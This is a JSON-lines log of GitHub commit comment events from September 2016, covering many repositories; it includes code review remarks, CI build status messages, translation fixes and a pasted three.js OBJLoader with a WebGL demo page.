{"id":"4574387579","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19055115,"position":null,"line":null,"path":null,"commit_id":"6e7b2b73ccb2f11723abf94b2ee3d2f74b84bd7e","created_at":"2016-09-16T14:32:25Z","updated_at":"2016-09-16T14:32:25Z","body":"5039_stratified_tank_speedup (nmerket) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6e7b2b73ccb2f11723abf94b2ee3d2f74b84bd7e-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-16T14:32:25Z"}
{"id":"4574394434","type":"CommitCommentEvent","actor":{"login":"mourner"},"repo":{"name":"webgeodatavore/supercluster"},"payload":{"comment":{"id":19055140,"position":6,"line":6,"path":"package.json","commit_id":"e7687cdf0a3a677930c5df844f8dfcf160923f37","created_at":"2016-09-16T14:33:38Z","updated_at":"2016-09-16T14:33:38Z","body":"This should remain `\"main\": \"index.js\"` — those fields are not what you think."}},"created_at":"2016-09-16T14:33:38Z"}
{"id":"4574395895","type":"CommitCommentEvent","actor":{"login":"menghuanzhixing"},"repo":{"name":"menghuanzhixing/webgl8"},"payload":{"comment":{"id":19055146,"position":null,"line":null,"path":null,"commit_id":"d6ba3f6a4e8b245128a4f968458c0ff7ec9dc551","created_at":"2016-09-16T14:33:53Z","updated_at":"2016-09-16T14:33:53Z","body":"/**\r\n * @author mrdoob / http://mrdoob.com/\r\n */\r\n\r\nTHREE.OBJLoader = function ( manager ) {\r\n\r\n\tthis.manager = ( manager !== undefined ) ? manager : THREE.DefaultLoadingManager;\r\n\r\n};\r\n\r\nTHREE.OBJLoader.prototype = {\r\n\r\n\tconstructor: THREE.OBJLoader,\r\n\r\n\tload: function ( url, onLoad, onProgress, onError ) {\r\n\r\n\t\tvar scope = this;\r\n\r\n\t\tvar loader = new THREE.XHRLoader( scope.manager );\r\n\t\tloader.setCrossOrigin( this.crossOrigin );\r\n\t\tloader.load( url, function ( text ) {\r\n\r\n\t\t\tonLoad( scope.parse( text ) );\r\n\r\n\t\t}, onProgress, onError );\r\n\r\n\t},\r\n\r\n\tsetCrossOrigin: function ( value ) {\r\n\r\n\t\tthis.crossOrigin = value;\r\n\r\n\t},\r\n\r\n\tparse: function ( text ) {\r\n\r\n\t\tconsole.time( 'OBJLoader' );\r\n\r\n\t\tvar object, objects = [];\r\n\t\tvar geometry, material;\r\n\r\n\t\tfunction parseVertexIndex( value ) {\r\n\r\n\t\t\tvar index = parseInt( value );\r\n\r\n\t\t\treturn ( index >= 0 ? index - 1 : index + vertices.length / 3 ) * 3;\r\n\r\n\t\t}\r\n\r\n\t\tfunction parseNormalIndex( value ) {\r\n\r\n\t\t\tvar index = parseInt( value );\r\n\r\n\t\t\treturn ( index >= 0 ? index - 1 : index + normals.length / 3 ) * 3;\r\n\r\n\t\t}\r\n\r\n\t\tfunction parseUVIndex( value ) {\r\n\r\n\t\t\tvar index = parseInt( value );\r\n\r\n\t\t\treturn ( index >= 0 ? index - 1 : index + uvs.length / 2 ) * 2;\r\n\r\n\t\t}\r\n\r\n\t\tfunction addVertex( a, b, c ) {\r\n\r\n\t\t\tgeometry.vertices.push(\r\n\t\t\t\tvertices[ a ], vertices[ a + 1 ], vertices[ a + 2 ],\r\n\t\t\t\tvertices[ b ], vertices[ b + 1 ], vertices[ b + 2 ],\r\n\t\t\t\tvertices[ c ], vertices[ c + 1 ], vertices[ c + 2 ]\r\n\t\t\t);\r\n\r\n\t\t}\r\n\r\n\t\tfunction addNormal( a, b, c ) {\r\n\r\n\t\t\tgeometry.normals.push(\r\n\t\t\t\tnormals[ a ], normals[ a + 1 ], normals[ a + 2 ],\r\n\t\t\t\tnormals[ b ], normals[ b + 1 ], normals[ b + 2 ],\r\n\t\t\t\tnormals[ c ], normals[ c + 1 ], normals[ c + 2 ]\r\n\t\t\t);\r\n\r\n\t\t}\r\n\r\n\t\tfunction addUV( a, b, c ) {\r\n\r\n\t\t\tgeometry.uvs.push(\r\n\t\t\t\tuvs[ a ], uvs[ a + 1 ],\r\n\t\t\t\tuvs[ b ], uvs[ b + 1 ],\r\n\t\t\t\tuvs[ c ], uvs[ c + 1 ]\r\n\t\t\t);\r\n\r\n\t\t}\r\n\r\n\t\tfunction addFace( a, b, c, d,  ua, ub, uc, ud, na, nb, nc, nd ) {\r\n\r\n\t\t\tvar ia = parseVertexIndex( a );\r\n\t\t\tvar ib = parseVertexIndex( b );\r\n\t\t\tvar ic = parseVertexIndex( c );\r\n\t\t\tvar id;\r\n\r\n\t\t\tif ( d === undefined ) {\r\n\r\n\t\t\t\taddVertex( ia, ib, ic );\r\n\r\n\t\t\t} else {\r\n\r\n\t\t\t\tid = parseVertexIndex( d );\r\n\r\n\t\t\t\taddVertex( ia, ib, id );\r\n\t\t\t\taddVertex( ib, ic, id );\r\n\r\n\t\t\t}\r\n\r\n\t\t\tif ( ua !== undefined ) {\r\n\r\n\t\t\t\tia = parseUVIndex( ua );\r\n\t\t\t\tib = parseUVIndex( ub );\r\n\t\t\t\tic = parseUVIndex( uc );\r\n\r\n\t\t\t\tif ( d === undefined ) {\r\n\r\n\t\t\t\t\taddUV( ia, ib, ic );\r\n\r\n\t\t\t\t} else {\r\n\r\n\t\t\t\t\tid = parseUVIndex( ud );\r\n\r\n\t\t\t\t\taddUV( ia, ib, id );\r\n\t\t\t\t\taddUV( ib, ic, id );\r\n\r\n\t\t\t\t}\r\n\r\n\t\t\t}\r\n\r\n\t\t\tif ( na !== undefined ) {\r\n\r\n\t\t\t\tia = parseNormalIndex( na );\r\n\t\t\t\tib = parseNormalIndex( nb );\r\n\t\t\t\tic = parseNormalIndex( nc );\r\n\r\n\t\t\t\tif ( d === undefined ) {\r\n\r\n\t\t\t\t\taddNormal( ia, ib, ic );\r\n\r\n\t\t\t\t} else {\r\n\r\n\t\t\t\t\tid = parseNormalIndex( nd );\r\n\r\n\t\t\t\t\taddNormal( ia, ib, id );\r\n\t\t\t\t\taddNormal( ib, ic, id );\r\n\r\n\t\t\t\t}\r\n\r\n\t\t\t}\r\n\r\n\t\t}\r\n\r\n\t\t// create mesh if no objects in text\r\n\r\n\t\tif ( /^o /gm.test( text ) === false ) {\r\n\r\n\t\t\tgeometry = {\r\n\t\t\t\tvertices: [],\r\n\t\t\t\tnormals: [],\r\n\t\t\t\tuvs: []\r\n\t\t\t};\r\n\r\n\t\t\tmaterial = {\r\n\t\t\t\tname: ''\r\n\t\t\t};\r\n\r\n\t\t\tobject = {\r\n\t\t\t\tname: '',\r\n\t\t\t\tgeometry: geometry,\r\n\t\t\t\tmaterial: material\r\n\t\t\t};\r\n\r\n\t\t\tobjects.push( object );\r\n\r\n\t\t}\r\n\r\n\t\tvar vertices = [];\r\n\t\tvar normals = [];\r\n\t\tvar uvs = [];\r\n\r\n\t\t// v float float float\r\n\r\n\t\tvar vertex_pattern = /v( +[\\d|\\.|\\+|\\-|e|E]+)( +[\\d|\\.|\\+|\\-|e|E]+)( +[\\d|\\.|\\+|\\-|e|E]+)/;\r\n\r\n\t\t// vn float float float\r\n\r\n\t\tvar normal_pattern = /vn( +[\\d|\\.|\\+|\\-|e|E]+)( +[\\d|\\.|\\+|\\-|e|E]+)( +[\\d|\\.|\\+|\\-|e|E]+)/;\r\n\r\n\t\t// vt float float\r\n\r\n\t\tvar uv_pattern = /vt( +[\\d|\\.|\\+|\\-|e|E]+)( +[\\d|\\.|\\+|\\-|e|E]+)/;\r\n\r\n\t\t// f vertex vertex vertex ...\r\n\r\n\t\tvar face_pattern1 = /f( +-?\\d+)( +-?\\d+)( +-?\\d+)( +-?\\d+)?/;\r\n\r\n\t\t// f vertex/uv vertex/uv vertex/uv ...\r\n\r\n\t\tvar face_pattern2 = /f( +(-?\\d+)\\/(-?\\d+))( +(-?\\d+)\\/(-?\\d+))( +(-?\\d+)\\/(-?\\d+))( +(-?\\d+)\\/(-?\\d+))?/;\r\n\r\n\t\t// f vertex/uv/normal vertex/uv/normal vertex/uv/normal ...\r\n\r\n\t\tvar face_pattern3 = /f( +(-?\\d+)\\/(-?\\d+)\\/(-?\\d+))( +(-?\\d+)\\/(-?\\d+)\\/(-?\\d+))( +(-?\\d+)\\/(-?\\d+)\\/(-?\\d+))( +(-?\\d+)\\/(-?\\d+)\\/(-?\\d+))?/;\r\n\r\n\t\t// f vertex//normal vertex//normal vertex//normal ...\r\n\r\n\t\tvar face_pattern4 = /f( +(-?\\d+)\\/\\/(-?\\d+))( +(-?\\d+)\\/\\/(-?\\d+))( +(-?\\d+)\\/\\/(-?\\d+))( +(-?\\d+)\\/\\/(-?\\d+))?/;\r\n\r\n\t\t//\r\n\r\n\t\tvar lines = text.split( '\\n' );\r\n\r\n\t\tfor ( var i = 0; i < lines.length; i ++ ) {\r\n\r\n\t\t\tvar line = lines[ i ];\r\n\t\t\tline = line.trim();\r\n\r\n\t\t\tvar result;\r\n\r\n\t\t\tif ( line.length === 0 || line.charAt( 0 ) === '#' ) {\r\n\r\n\t\t\t\tcontinue;\r\n\r\n\t\t\t} else if ( ( result = vertex_pattern.exec( line ) ) !== null ) {\r\n\r\n\t\t\t\t// [\"v 1.0 2.0 3.0\", \"1.0\", \"2.0\", \"3.0\"]\r\n\r\n\t\t\t\tvertices.push(\r\n\t\t\t\t\tparseFloat( result[ 1 ] ),\r\n\t\t\t\t\tparseFloat( result[ 2 ] ),\r\n\t\t\t\t\tparseFloat( result[ 3 ] )\r\n\t\t\t\t);\r\n\r\n\t\t\t} else if ( ( result = normal_pattern.exec( line ) ) !== null ) {\r\n\r\n\t\t\t\t// [\"vn 1.0 2.0 3.0\", \"1.0\", \"2.0\", \"3.0\"]\r\n\r\n\t\t\t\tnormals.push(\r\n\t\t\t\t\tparseFloat( result[ 1 ] ),\r\n\t\t\t\t\tparseFloat( result[ 2 ] ),\r\n\t\t\t\t\tparseFloat( result[ 3 ] )\r\n\t\t\t\t);\r\n\r\n\t\t\t} else if ( ( result = uv_pattern.exec( line ) ) !== null ) {\r\n\r\n\t\t\t\t// [\"vt 0.1 0.2\", \"0.1\", \"0.2\"]\r\n\r\n\t\t\t\tuvs.push(\r\n\t\t\t\t\tparseFloat( result[ 1 ] ),\r\n\t\t\t\t\tparseFloat( result[ 2 ] )\r\n\t\t\t\t);\r\n\r\n\t\t\t} else if ( ( result = face_pattern1.exec( line ) ) !== null ) {\r\n\r\n\t\t\t\t// [\"f 1 2 3\", \"1\", \"2\", \"3\", undefined]\r\n\r\n\t\t\t\taddFace(\r\n\t\t\t\t\tresult[ 1 ], result[ 2 ], result[ 3 ], result[ 4 ]\r\n\t\t\t\t);\r\n\r\n\t\t\t} else if ( ( result = face_pattern2.exec( line ) ) !== null ) {\r\n\r\n\t\t\t\t// [\"f 1/1 2/2 3/3\", \" 1/1\", \"1\", \"1\", \" 2/2\", \"2\", \"2\", \" 3/3\", \"3\", \"3\", undefined, undefined, undefined]\r\n\r\n\t\t\t\taddFace(\r\n\t\t\t\t\tresult[ 2 ], result[ 5 ], result[ 8 ], result[ 11 ],\r\n\t\t\t\t\tresult[ 3 ], result[ 6 ], result[ 9 ], result[ 12 ]\r\n\t\t\t\t);\r\n\r\n\t\t\t} else if ( ( result = face_pattern3.exec( line ) ) !== null ) {\r\n\r\n\t\t\t\t// [\"f 1/1/1 2/2/2 3/3/3\", \" 1/1/1\", \"1\", \"1\", \"1\", \" 2/2/2\", \"2\", \"2\", \"2\", \" 3/3/3\", \"3\", \"3\", \"3\", undefined, undefined, undefined, undefined]\r\n\r\n\t\t\t\taddFace(\r\n\t\t\t\t\tresult[ 2 ], result[ 6 ], result[ 10 ], result[ 14 ],\r\n\t\t\t\t\tresult[ 3 ], result[ 7 ], result[ 11 ], result[ 15 ],\r\n\t\t\t\t\tresult[ 4 ], result[ 8 ], result[ 12 ], result[ 16 ]\r\n\t\t\t\t);\r\n\r\n\t\t\t} else if ( ( result = face_pattern4.exec( line ) ) !== null ) {\r\n\r\n\t\t\t\t// [\"f 1//1 2//2 3//3\", \" 1//1\", \"1\", \"1\", \" 2//2\", \"2\", \"2\", \" 3//3\", \"3\", \"3\", undefined, undefined, undefined]\r\n\r\n\t\t\t\taddFace(\r\n\t\t\t\t\tresult[ 2 ], result[ 5 ], result[ 8 ], result[ 11 ],\r\n\t\t\t\t\tundefined, undefined, undefined, undefined,\r\n\t\t\t\t\tresult[ 3 ], result[ 6 ], result[ 9 ], result[ 12 ]\r\n\t\t\t\t);\r\n\r\n\t\t\t} else if ( /^o /.test( line ) ) {\r\n\r\n\t\t\t\tgeometry = {\r\n\t\t\t\t\tvertices: [],\r\n\t\t\t\t\tnormals: [],\r\n\t\t\t\t\tuvs: []\r\n\t\t\t\t};\r\n\r\n\t\t\t\tmaterial = {\r\n\t\t\t\t\tname: ''\r\n\t\t\t\t};\r\n\r\n\t\t\t\tobject = {\r\n\t\t\t\t\tname: line.substring( 2 ).trim(),\r\n\t\t\t\t\tgeometry: geometry,\r\n\t\t\t\t\tmaterial: material\r\n\t\t\t\t};\r\n\r\n\t\t\t\tobjects.push( object )\r\n\r\n\t\t\t} else if ( /^g /.test( line ) ) {\r\n\r\n\t\t\t\t// group\r\n\r\n\t\t\t} else if ( /^usemtl /.test( line ) ) {\r\n\r\n\t\t\t\t// material\r\n\r\n\t\t\t\tmaterial.name = line.substring( 7 ).trim();\r\n\r\n\t\t\t} else if ( /^mtllib /.test( line ) ) {\r\n\r\n\t\t\t\t// mtl file\r\n\r\n\t\t\t} else if ( /^s /.test( line ) ) {\r\n\r\n\t\t\t\t// smooth shading\r\n\r\n\t\t\t} else {\r\n\r\n\t\t\t\t// console.log( \"THREE.OBJLoader: Unhandled line \" + line );\r\n\r\n\t\t\t}\r\n\r\n\t\t}\r\n\r\n\t\tvar container = new THREE.Object3D();\r\n\r\n\t\tfor ( var i = 0, l = objects.length; i < l; i ++ ) {\r\n\r\n\t\t\tobject = objects[ i ];\r\n\t\t\tgeometry = object.geometry;\r\n\r\n\t\t\tvar buffergeometry = new THREE.BufferGeometry();\r\n\r\n\t\t\tbuffergeometry.addAttribute( 'position', new THREE.BufferAttribute( new Float32Array( geometry.vertices ), 3 ) );\r\n\r\n\t\t\tif ( geometry.normals.length > 0 ) {\r\n\r\n\t\t\t\tbuffergeometry.addAttribute( 'normal', new THREE.BufferAttribute( new Float32Array( geometry.normals ), 3 ) );\r\n\r\n\t\t\t}\r\n\r\n\t\t\tif ( geometry.uvs.length > 0 ) {\r\n\r\n\t\t\t\tbuffergeometry.addAttribute( 'uv', new THREE.BufferAttribute( new Float32Array( geometry.uvs ), 2 ) );\r\n\r\n\t\t\t}\r\n\r\n\t\t\tmaterial = new THREE.MeshLambertMaterial();\r\n\t\t\tmaterial.name = object.material.name;\r\n\r\n\t\t\tvar mesh = new THREE.Mesh( buffergeometry, material );\r\n\t\t\tmesh.name = object.name;\r\n\r\n\t\t\tcontainer.add( mesh );\r\n\r\n\t\t}\r\n\r\n\t\tconsole.timeEnd( 'OBJLoader' );\r\n\r\n\t\treturn container;\r\n\r\n\t}\r\n\r\n};\r\n"}},"created_at":"2016-09-16T14:33:53Z"}
{"id":"4574396408","type":"CommitCommentEvent","actor":{"login":"SharakPL"},"repo":{"name":"PrestaShop/PrestaShop"},"payload":{"comment":{"id":19055147,"position":null,"line":null,"path":null,"commit_id":"940cf780eb8ce90612ca0e0826b4d05493a4b760","created_at":"2016-09-16T14:33:59Z","updated_at":"2016-09-16T14:33:59Z","body":"Great, but this fix is 2 years old. How come each new 1.6 upgrade is having this issue over and over again? :/ "}},"created_at":"2016-09-16T14:33:59Z"}
{"id":"4574398001","type":"CommitCommentEvent","actor":{"login":"Ana06"},"repo":{"name":"eduardoj/open-build-service"},"payload":{"comment":{"id":19055151,"position":20,"line":805,"path":"src/api/spec/controllers/webui/project_controller_spec.rb","commit_id":"9af5bae07551a4ea629e2f75ba5982c7db303028","created_at":"2016-09-16T14:34:17Z","updated_at":"2016-09-16T14:34:17Z","body":"You can query it by the project, without the `.id`:\r\n\r\n`it { expect(user.home_project.maintained_projects.where(project: user.home_project)).to exist }`"}},"created_at":"2016-09-16T14:34:17Z"}
{"id":"4574399381","type":"CommitCommentEvent","actor":{"login":"avitalyahel"},"repo":{"name":"avitalyahel/autolite"},"payload":{"comment":{"id":19055155,"position":null,"line":null,"path":null,"commit_id":"0474f62e60672fa7e72bf9815e0b9aecc48f107b","created_at":"2016-09-16T14:34:31Z","updated_at":"2016-09-16T14:34:31Z","body":"Done."}},"created_at":"2016-09-16T14:34:31Z"}
{"id":"4574400203","type":"CommitCommentEvent","actor":{"login":"dothework"},"repo":{"name":"GreekProgrammer/bloccit-2"},"payload":{"comment":{"id":19055159,"position":null,"line":null,"path":null,"commit_id":"e6552ced5664033e7cc80c7da91f57d5a8869d3a","created_at":"2016-09-16T14:34:39Z","updated_at":"2016-09-16T14:34:39Z","body":"@GreekProgrammer Nice work here. Lean in!"}},"created_at":"2016-09-16T14:34:39Z"}
{"id":"4574400336","type":"CommitCommentEvent","actor":{"login":"CismE97"},"repo":{"name":"CismE97/MyFinance"},"payload":{"comment":{"id":19055160,"position":null,"line":null,"path":null,"commit_id":"e24bae40ec629fa9dcb9595e0f0462804827cb3e","created_at":"2016-09-16T14:34:40Z","updated_at":"2016-09-16T14:34:40Z","body":"Reste encore à ajouter la **suppression** d'élément et un **graphique** dans la gestion du budget. "}},"created_at":"2016-09-16T14:34:40Z"}
{"id":"4574401552","type":"CommitCommentEvent","actor":{"login":"menghuanzhixing"},"repo":{"name":"menghuanzhixing/webgl8"},"payload":{"comment":{"id":19055166,"position":null,"line":null,"path":null,"commit_id":"d6ba3f6a4e8b245128a4f968458c0ff7ec9dc551","created_at":"2016-09-16T14:34:52Z","updated_at":"2016-09-16T14:34:52Z","body":"<!DOCTYPE html>\r\n<html>\r\n\t<head>\r\n\t\t<!-- 移动相机的位置-->\r\n\t\t<meta charset=\"UTF-8\">\r\n\t\t<title>WebGL中文网</title>\r\n\t\t<script src=\"js/three.js\"></script>\r\n        <script src=\"js/Stats.js\"></script>\r\n\t\t<script src=\"js/tween.min.js\"></script>\r\n        <script src=\"js/loaders/OBJLoader.js\"></script>\r\n        <script src=\"js/controls/TrackballControls.js\"></script>\r\n\r\n\t\t\r\n\t\t<style type=\"text/css\">\r\n\t\t\tdiv#canvas-frame {\r\n\t\t\t\tborder: none;\r\n\t\t\t\tcursor: pointer;\r\n\t\t\t\twidth: 100%;\r\n\t\t\t\theight: 600px;\r\n\t\t\t\tbackground-color: #EEEEEE;\r\n\t\t\t}\r\n\r\n\t\t</style>\r\n\t\t<script>\r\n\t\t\t/*\r\n\t\t\t* 围绕某个 x,y,z轴测试\r\n\t\t\t*/\r\n\t\t\t\r\n\t\t\t\r\n            var renderer;\r\n            var stats;\r\n\r\n            function initThree() {\r\n                width = document.getElementById('canvas-frame').clientWidth;\r\n                height = document.getElementById('canvas-frame').clientHeight;\r\n                renderer = new THREE.WebGLRenderer({\r\n                    antialias : true\r\n                });\r\n                renderer.setSize(width, height);\r\n                document.getElementById('canvas-frame').appendChild(renderer.domElement);\r\n                renderer.setClearColor(0xFFFFFF, 1.0);\r\n\r\n                stats = new Stats();\r\n                stats.domElement.style.position = 'absolute';\r\n                stats.domElement.style.left = '0px';\r\n                stats.domElement.style.top = '0px';\r\n                document.getElementById('canvas-frame').appendChild(stats.domElement);\r\n            }\r\n\r\n            var camera;\r\n            function initCamera() {\r\n                camera = new THREE.PerspectiveCamera(1, width / height, 1, 10000);\r\n                camera.position.x = 100;\r\n                camera.position.y = 300;\r\n                camera.position.z = 600;\r\n                camera.up.x = 0;\r\n                camera.up.y = 1;\r\n                camera.up.z = 0;\r\n                camera.lookAt({\r\n                    x : 0,\r\n                    y : 0,\r\n                    z : 0\r\n                });\r\n            }\r\n\r\n            var scene;\r\n            function initScene() {\r\n                scene = new THREE.Scene();\r\n            }\r\n\r\n            var light;\r\n            function initLight() {\r\n                light = new THREE.AmbientLight(0xFF0000);\r\n                light.position.set(100, 100, 200);\r\n                scene.add(light);\r\n\r\n            }\r\n\r\n           \r\n\t\t\tvar objMesh;\r\n            function initObject() {              \r\n\t\t\t    var loader = new THREE.OBJLoader( );\r\n                loader.load( 'man.obj', function ( object ) {                    \r\n                    objMesh = object; \r\n                    scene.add( objMesh);\t\t\t\t\t\t\t\t\t\r\n                });\t\t\t\t\r\n            }\r\n\t\t\t\r\n\t\t\t\r\n            function threeStart() {\r\n                initThree();\r\n                initCamera();\r\n                initScene();\r\n                initLight();\r\n                initObject();\t\t\t\t\r\n                animation();\r\n            }\r\n\r\n            // 帧循环、游戏循环\r\n            function animation()\r\n            {            \t\r\n                renderer.render(scene, camera);\r\n                requestAnimationFrame(animation);\r\n            }\r\n\r\n\t\t</script>\r\n\t</head>\r\n\r\n\t<body onload=\"threeStart();\">\r\n\t\t<div style=\"margin-left:150px;\">\r\n\t\t\t\r\n\t\t</div>\r\n\t\t<div id=\"canvas-frame\"></div>\r\n\t</body>\r\n</html>"}},"created_at":"2016-09-16T14:34:52Z"}
{"id":"4574402554","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19055168,"position":null,"line":null,"path":null,"commit_id":"a011ee86fc89ad2af8ce96842d01b550ab0bebee","created_at":"2016-09-16T14:35:03Z","updated_at":"2016-09-16T14:35:03Z","body":"https://github.com/NateShoffner/PySnip/commit/8868081bccb78970b217d7fd907af9d810175291\r\n"}},"created_at":"2016-09-16T14:35:03Z"}
{"id":"4574402881","type":"CommitCommentEvent","actor":{"login":"juliantoledo"},"repo":{"name":"GoogleChrome/gulliver"},"payload":{"comment":{"id":19055170,"position":45,"line":184,"path":"lib/pwa.js","commit_id":"6ef443463ffb7fbc3722c76f712a6dfe9c15cf94","created_at":"2016-09-16T14:35:07Z","updated_at":"2016-09-16T14:35:07Z","body":"@ithinkihaveacat I agree, now we get the real error. Fixed."}},"created_at":"2016-09-16T14:35:07Z"}
{"id":"4574406939","type":"CommitCommentEvent","actor":{"login":"jshawl"},"repo":{"name":"ga-wdi-exercises/project1"},"payload":{"comment":{"id":19055178,"position":8,"line":12,"path":"evaluation-template.md","commit_id":"7e1cfd310d16f3ab001e9a2562dcbf405a9a6b41","created_at":"2016-09-16T14:35:49Z","updated_at":"2016-09-16T14:35:49Z","body":"👍  why can't i open up a review here"}},"created_at":"2016-09-16T14:35:49Z"}
{"id":"4574407141","type":"CommitCommentEvent","actor":{"login":"mauritsvanrees"},"repo":{"name":"plone/plone.outputfilters"},"payload":{"comment":{"id":19055180,"position":null,"line":null,"path":null,"commit_id":"358741a8af262163b2fcb5158417b7f67520d433","created_at":"2016-09-16T14:35:51Z","updated_at":"2016-09-16T14:35:51Z","body":"This commit was two years ago, so I'm late to the party, but... what does this actually do?\r\nIt looks to me like this simply registers an extra filter on Plone 5 which does nothing. It does not replace the other filter that is registered in this `configure.zcml`. When I add a pdb in the call method of the other filter in Plone 5.0 coredev, I see it still gets called.\r\n\r\nDoesn't the other filter need to have a `zcml:condition=\"not-have plone-5\"`?\r\n\r\nAnd where is the resolveuid rewriting actually done in Plone 5?\r\nRelated question on community.plone.org: https://community.plone.org/t/relative-urls-in-tinymcewidget-products-archetypes-1-11-2/2742/1"}},"created_at":"2016-09-16T14:35:51Z"}
{"id":"4574410992","type":"CommitCommentEvent","actor":{"login":"TheoChevalier"},"repo":{"name":"rust-lang/rust-www"},"payload":{"comment":{"id":19055190,"position":13,"line":17,"path":"fr-FR/downloads.html","commit_id":"6339db7949a9cbc7d85fd99c2b55600e91c4f431","created_at":"2016-09-16T14:36:31Z","updated_at":"2016-09-16T14:36:31Z","body":"rétrocompatible (en un seul mot)"}},"created_at":"2016-09-16T14:36:31Z"}
{"id":"4574411900","type":"CommitCommentEvent","actor":{"login":"TheoChevalier"},"repo":{"name":"rust-lang/rust-www"},"payload":{"comment":{"id":19055192,"position":39,"line":191,"path":"fr-FR/downloads.html","commit_id":"6339db7949a9cbc7d85fd99c2b55600e91c4f431","created_at":"2016-09-16T14:36:40Z","updated_at":"2016-09-16T14:36:40Z","body":"dépend"}},"created_at":"2016-09-16T14:36:40Z"}
{"id":"4574412919","type":"CommitCommentEvent","actor":{"login":"LeandroRoberto"},"repo":{"name":"interlegis/sapl"},"payload":{"comment":{"id":19055195,"position":4,"line":76,"path":"sapl/comissoes/models.py","commit_id":"fa1fd3da9b108feec8b5177853515f0fa1e09fd1","created_at":"2016-09-16T14:36:50Z","updated_at":"2016-09-16T14:36:50Z","body":"A inclusão deste campo causou erro no migrador!"}},"created_at":"2016-09-16T14:36:50Z"}
{"id":"4574413157","type":"CommitCommentEvent","actor":{"login":"avitalyahel"},"repo":{"name":"avitalyahel/autolite"},"payload":{"comment":{"id":19055196,"position":11,"line":117,"path":"actl","commit_id":"bd56a03665fd1385a715552962cc92be932c1edf","created_at":"2016-09-16T14:36:52Z","updated_at":"2016-09-16T14:36:52Z","body":"Done."}},"created_at":"2016-09-16T14:36:52Z"}
{"id":"4574413736","type":"CommitCommentEvent","actor":{"login":"TheoChevalier"},"repo":{"name":"rust-lang/rust-www"},"payload":{"comment":{"id":19055198,"position":12,"line":10,"path":"_layouts/fr-FR/basic.html","commit_id":"6339db7949a9cbc7d85fd99c2b55600e91c4f431","created_at":"2016-09-16T14:36:58Z","updated_at":"2016-09-16T14:36:58Z","body":"sûreté"}},"created_at":"2016-09-16T14:36:58Z"}
{"id":"4574415191","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19055201,"position":null,"line":null,"path":null,"commit_id":"c35a8dba70e7ab7c387f7c5990c71065b91ed7b2","created_at":"2016-09-16T14:37:15Z","updated_at":"2016-09-16T14:37:15Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#JOxrQa3MQsmvCLfA81UxfA"}},"created_at":"2016-09-16T14:37:15Z"}
{"id":"4574415953","type":"CommitCommentEvent","actor":{"login":"SolarLune"},"repo":{"name":"SolarLune/bdx"},"payload":{"comment":{"id":19055204,"position":31,"line":31,"path":"extern/fontwriter/src/com/solarlune/fontwriter/DesktopLauncher.java","commit_id":"feec72706f463cc3da7262f013ef75fef448f537","created_at":"2016-09-16T14:37:22Z","updated_at":"2016-09-16T14:37:22Z","body":"I'm not sure what you mean - \"this\" as in what? The font generation has to happen before BDX runs, and it can't be part of the actual BDX application, because that would require that we include the font generation code in the source, which would mean that the HTML5 target wouldn't build.\r\n\r\nI added a feature to generate font textures always if an option is triggered in the GUI. That makes it easier to test out font changes without having to go back and delete the font files in the assets folder."}},"created_at":"2016-09-16T14:37:22Z"}
{"id":"4574416323","type":"CommitCommentEvent","actor":{"login":"kotlin95"},"repo":{"name":"kotlin95/my-first-blog"},"payload":{"comment":{"id":19055205,"position":null,"line":null,"path":null,"commit_id":"5dbd4727167ff5f3b1ea336275c9969149292d32","created_at":"2016-09-16T14:37:27Z","updated_at":"2016-09-16T14:37:27Z","body":"> hehe"}},"created_at":"2016-09-16T14:37:27Z"}
{"id":"4574419003","type":"CommitCommentEvent","actor":{"login":"jbmoelker"},"repo":{"name":"JesseE/nunjucks"},"payload":{"comment":{"id":19055208,"position":null,"line":null,"path":null,"commit_id":"f6733b71bdcd5779a67e0f2fb31e970f34c485a9","created_at":"2016-09-16T14:37:51Z","updated_at":"2016-09-16T14:37:51Z","body":"Looks good! Can you do the same for [filters section in French](https://github.com/JesseE/nunjucks/blob/master/docs/fr/templating.md#filtres-intégrés)? The [filters section in Chinese](https://github.com/JesseE/nunjucks/blob/master/docs/cn/templating.md#内置的过滤器) is still using links to filters on the Jinja site. But that would be a good thing to mention in your PR, as an explanation why you didn't update that section."}},"created_at":"2016-09-16T14:37:51Z"}
{"id":"4574422100","type":"CommitCommentEvent","actor":{"login":"bunnidevalla"},"repo":{"name":"jeremyth/mongos"},"payload":{"comment":{"id":19055214,"position":15,"line":15,"path":"mongos_startup.sh","commit_id":"1bc46537858a13cd4681329eda47c55268064335","created_at":"2016-09-16T14:38:22Z","updated_at":"2016-09-16T14:38:22Z","body":"hi\r\n"}},"created_at":"2016-09-16T14:38:22Z"}
{"id":"4574425574","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/artwork-maia"},"payload":{"comment":{"id":19055221,"position":null,"line":null,"path":null,"commit_id":"653ea50d702db94a92d4a81f00a84d48aa045593","created_at":"2016-09-16T14:38:57Z","updated_at":"2016-09-16T14:38:57Z","body":"Also added MaiaDark color scheme, contributed by [ben81](https://forum.manjaro.org/t/maia-dark-kde-color-scheme/9332)"}},"created_at":"2016-09-16T14:38:57Z"}
{"id":"4574426148","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19055223,"position":null,"line":null,"path":null,"commit_id":"a011ee86fc89ad2af8ce96842d01b550ab0bebee","created_at":"2016-09-16T14:39:03Z","updated_at":"2016-09-16T14:39:03Z","body":"https://github.com/openatv/enigma2/commit/c7acf85abf242a5f1ed6735bc3c7bde606036d33\r\nhttps://github.com/openatv/enigma2/commit/a10b12ac7c581d482740b09f2a6e2ccb89a0f2ed\r\n"}},"created_at":"2016-09-16T14:39:03Z"}
